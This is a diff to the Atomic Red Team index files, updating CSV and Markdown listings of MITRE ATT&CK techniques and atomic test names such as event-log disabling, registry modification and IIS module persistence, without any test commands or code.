+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
 defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
@@ -162,7 +164,8 @@ defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704
 defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
 defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
 defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
-defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -520,6 +523,7 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShe
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
@@ -555,7 +559,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service
 persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
-persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
+persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
@@ -616,6 +620,8 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
+persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
+persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -41,6 +41,7 @@
 - T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
   - Atomic Test #1: ExecIntoContainer [containers]
+  - Atomic Test #2: Docker Exec Into Container [containers]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 

atomics/Indexes/Indexes-Markdown/google-workspace-index.md

@@ -43,7 +43,7 @@
 
 # collection
 - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 

atomics/Indexes/Indexes-Markdown/index.md

@@ -171,7 +171,8 @@
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
   - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
-- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562 Impair Defenses](../../T1562/T1562.md)
+  - Atomic Test #1: Windows Disable LSA Protection [windows]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
   - Atomic Test #1: Thread Execution Hijacking [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
@@ -212,11 +213,12 @@
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
 - [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
-  - Atomic Test #2: Kill Event Log Service Threads [windows]
-  - Atomic Test #3: Impair Windows Audit Log Policy [windows]
-  - Atomic Test #4: Clear Windows Audit Policy Config [windows]
-  - Atomic Test #5: Disable Event Logging with wevtutil [windows]
-  - Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
+  - Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell [windows]
+  - Atomic Test #3: Kill Event Log Service Threads [windows]
+  - Atomic Test #4: Impair Windows Audit Log Policy [windows]
+  - Atomic Test #5: Clear Windows Audit Policy Config [windows]
+  - Atomic Test #6: Disable Event Logging with wevtutil [windows]
+  - Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
 - [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
   - Atomic Test #1: Control Panel Items [windows]
 - T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -291,7 +293,8 @@
   - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
   - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
   - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
-  - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
+  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
+  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -781,7 +784,8 @@
   - Atomic Test #2: Edit an existing time provider [windows]
 - T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap [macos, linux]
+  - Atomic Test #1: Trap EXIT [macos, linux]
+  - Atomic Test #2: Trap SIGINT [macos, linux]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -1035,6 +1039,7 @@
 - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
   - Atomic Test #1: ExecIntoContainer [containers]
+  - Atomic Test #2: Docker Exec Into Container [containers]
 - T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
@@ -1069,6 +1074,7 @@
   - Atomic Test #19: PowerShell Command Execution [windows]
   - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
   - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
@@ -1183,7 +1189,7 @@
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
-  - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
+  - Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
 - [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
   - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1235,7 +1241,8 @@
 - T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap [macos, linux]
+  - Atomic Test #1: Trap EXIT [macos, linux]
+  - Atomic Test #2: Trap SIGINT [macos, linux]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -1353,7 +1360,9 @@
 - T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1505.004 IIS Components](../../T1505.004/T1505.004.md)
+  - Atomic Test #1: Install IIS Module using AppCmd.exe [windows]
+  - Atomic Test #2: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule [windows]
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
@@ -1521,7 +1530,8 @@
 - [T1125 Video Capture](../../T1125/T1125.md)
   - Atomic Test #1: Registry artefact when application use webcam [windows]
 - T1213.001 Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
+  - Atomic Test #1: Office365 - Email Forwarding [office-365]
 - T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #1: AppleScript - Prompt User for Password [macos]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -200,7 +200,7 @@
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -249,7 +249,8 @@
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap [macos, linux]
+  - Atomic Test #1: Trap EXIT [macos, linux]
+  - Atomic Test #2: Trap SIGINT [macos, linux]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -319,7 +320,8 @@
 - T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap [macos, linux]
+  - Atomic Test #1: Trap EXIT [macos, linux]
+  - Atomic Test #2: Trap SIGINT [macos, linux]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -187,7 +187,7 @@
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #1: AppleScript - Prompt User for Password [macos]
@@ -242,7 +242,8 @@
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap [macos, linux]
+  - Atomic Test #1: Trap EXIT [macos, linux]
+  - Atomic Test #2: Trap SIGINT [macos, linux]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
@@ -327,7 +328,8 @@
   - Atomic Test #1: Launch Daemon [macos]
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap [macos, linux]
+  - Atomic Test #1: Trap EXIT [macos, linux]
+  - Atomic Test #2: Trap SIGINT [macos, linux]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/office-365-index.md

@@ -25,7 +25,8 @@
 # collection
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
+  - Atomic Test #1: Office365 - Email Forwarding [office-365]
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -116,7 +116,8 @@
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
   - Atomic Test #2: Certutil Rename and Decode [windows]
-- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562 Impair Defenses](../../T1562/T1562.md)
+  - Atomic Test #1: Windows Disable LSA Protection [windows]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
   - Atomic Test #1: Thread Execution Hijacking [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
@@ -153,11 +154,12 @@
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
 - [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
-  - Atomic Test #2: Kill Event Log Service Threads [windows]
-  - Atomic Test #3: Impair Windows Audit Log Policy [windows]
-  - Atomic Test #4: Clear Windows Audit Policy Config [windows]
-  - Atomic Test #5: Disable Event Logging with wevtutil [windows]
-  - Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
+  - Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell [windows]
+  - Atomic Test #3: Kill Event Log Service Threads [windows]
+  - Atomic Test #4: Impair Windows Audit Log Policy [windows]
+  - Atomic Test #5: Clear Windows Audit Policy Config [windows]
+  - Atomic Test #6: Disable Event Logging with wevtutil [windows]
+  - Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
 - [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
   - Atomic Test #1: Control Panel Items [windows]
 - T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -220,7 +222,8 @@
   - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
   - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
   - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
-  - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
+  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
+  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -799,6 +802,7 @@
   - Atomic Test #19: PowerShell Command Execution [windows]
   - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
   - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -875,7 +879,7 @@
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
-  - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
+  - Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
 - [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
   - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -995,7 +999,9 @@
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1505.004 IIS Components](../../T1505.004/T1505.004.md)
+  - Atomic Test #1: Install IIS Module using AppCmd.exe [windows]
+  - Atomic Test #2: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule [windows]
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
   - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
@@ -1102,7 +1108,7 @@
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1125 Video Capture](../../T1125/T1125.md)
   - Atomic Test #1: Registry artefact when application use webcam [windows]
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #2: PowerShell - Prompt User for Password [windows]

atomics/Indexes/Matrices/linux-matrix.md

@@ -19,7 +19,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
